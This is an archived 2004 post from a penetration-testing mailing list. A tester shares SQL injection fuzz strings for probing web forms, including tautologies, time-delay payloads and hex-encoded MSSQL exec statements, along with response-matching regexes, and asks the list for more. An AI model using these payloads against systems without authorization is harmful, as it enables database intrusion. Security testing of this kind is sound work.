SQL Injection Strings

From: Jeremy Junginger (jj_at_act.com)
Date: 06/25/04

  • Next message: R. DuFresne: "RE: Limited vs full blown testing" 
    To: <pen-test@securityfocus.com>
Date: Fri, 25 Jun 2004 08:01:39 -0700

    Good Morning,

    I'm customizing an http proxy that's feeding some POST parameters into web
    forms to test for SQL injections. I figured this would be the group to help
    put together a comprehensive list of "fuzz strings" to feed into the forms to
    test them. Here's what I have so far. I know it's far from complete.
    Please add any additional strings that you think may be helpful, or perhaps a
    link to an archived thread that has already discussed this?!?:

    'sqlvuln
    '+sqlvuln
    sqlvuln;
    (sqlvuln)
    a' or 1=1--
    a" or 1=1--
    a" or "a" = "a
    a' or 'a' = 'a
    1 or 1=1
    a' waitfor delay '0:0:10'--
    1 waitfor delay '0:0:10'--
    declare @q nvarchar (4000) select @q =
    0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0
    031003000270000
    declare @s varchar(22) select @s =
    0x77616974666F722064656C61792027303A303A31302700 exec(@s)
    declare @q nvarchar (4000) select @q =
    0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
    declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
    exec(@s)

    And if you're feeling even more generous, perhaps you have some suggestions
    on checking the response. I'm doing a regex search for the following to
    determine interesting strings. Of course I still have to take a look at some
    of the 200 responses to see if the waitfor and version commands worked :)

    HTTP/[0-9].[0-9] 500
    [Ee]rror
    (My)?SQL

    Thanks guys!

    -Jeremy

  • Next message: R. DuFresne: "RE: Limited vs full blown testing"